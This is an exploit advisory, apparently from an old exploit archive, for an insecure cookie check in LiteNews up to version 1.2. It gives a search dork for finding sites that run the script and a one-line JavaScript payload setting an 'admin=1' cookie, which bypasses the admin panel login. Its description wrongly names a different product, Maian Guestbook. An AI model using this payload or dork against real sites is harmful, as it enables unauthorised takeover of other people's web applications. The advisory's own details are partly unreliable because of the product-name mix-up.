######################################################################### # # # litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability # # # ######################################################################### # # # AUTHOR : Scary-Boys # # HOME : http://scary-boys.com # # Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations # # ######################################################################### # # # DorKs : "Powered By litenews" # # # ######################################################################### # # # DESCRIPTION : # # Maian Guestbook suffers from a insecure cookie # # the admin panel only checks if the cookie exists. # # # ######################################################################### # # # Vulnerability : # # # # javascript:document.cookie = "admin=1; path=/"; # # # ######################################################################### # # # after running the javascript, Go to "/admin/index.php" & Refresh # # # #########################################################################